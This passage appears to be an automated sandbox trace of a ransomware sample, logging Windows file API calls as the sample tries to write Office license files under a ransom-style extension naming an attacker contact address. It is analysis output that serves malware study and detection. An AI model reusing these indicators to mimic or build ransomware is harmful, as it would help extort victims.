Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.957] CloseHandle (hObject=0x514) returned 1 [0163.958] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.958] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_KMS_Client-ul.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_kms_client-ul.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.958] CloseHandle (hObject=0x514) returned 1 [0163.959] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.959] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.959] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.960] CloseHandle (hObject=0x514) returned 1 [0163.961] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.961] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.961] CloseHandle (hObject=0x514) returned 1 [0163.962] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.962] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.962] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.963] CloseHandle (hObject=0x514) returned 1 [0163.964] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.964] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\OutlookVL_MAK-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\outlookvl_mak-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.964] CloseHandle (hObject=0x514) returned 1 [0163.966] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.966] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.966] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.967] CloseHandle (hObject=0x514) returned 1 [0163.968] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.968] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.968] CloseHandle (hObject=0x514) returned 1 [0163.969] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.969] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personaldemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.970] CloseHandle (hObject=0x514) returned 1 [0163.971] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.971] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.971] CloseHandle (hObject=0x514) returned 1 [0163.972] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.972] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.972] CloseHandle (hObject=0x514) returned 1 [0163.973] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.973] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.973] CloseHandle (hObject=0x514) returned 1 [0163.974] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.974] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.974] CloseHandle (hObject=0x514) returned 1 [0163.975] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.975] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.976] CloseHandle (hObject=0x514) returned 1 [0163.977] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.977] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalPipcR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalpipcr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.977] CloseHandle (hObject=0x514) returned 1 [0163.978] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.978] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.978] CloseHandle (hObject=0x514) returned 1 [0163.979] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.979] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.979] CloseHandle (hObject=0x514) returned 1 [0163.980] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.980] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.980] CloseHandle (hObject=0x514) returned 1 [0163.981] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.981] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.982] CloseHandle (hObject=0x514) returned 1 [0163.982] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.983] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.983] CloseHandle (hObject=0x514) returned 1 [0163.984] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.984] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_OEM_Perp-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_oem_perp-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.984] CloseHandle (hObject=0x514) returned 1 [0163.985] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.985] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.985] CloseHandle (hObject=0x514) returned 1 [0163.986] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.986] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.987] CloseHandle (hObject=0x514) returned 1 [0163.987] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.988] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.988] CloseHandle (hObject=0x514) returned 1 [0163.989] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.989] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Retail-ul-phn.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_retail-ul-phn.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.294] CloseHandle (hObject=0x514) returned 1 [0164.295] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.295] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.295] CloseHandle (hObject=0x514) returned 1 [0164.296] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.296] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProCO365R_SubTrial-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproco365r_subtrial-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.296] CloseHandle (hObject=0x514) returned 1 [0164.297] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.297] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.297] CloseHandle (hObject=0x514) returned 1 [0164.298] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.298] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.298] CloseHandle (hObject=0x514) returned 1 [0164.299] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.299] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.299] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProDemoR_BypassTrial180-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectprodemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.300] CloseHandle (hObject=0x514) returned 1 [0164.300] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.300] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.300] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.301] CloseHandle (hObject=0x514) returned 1 [0164.301] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.301] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.301] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), 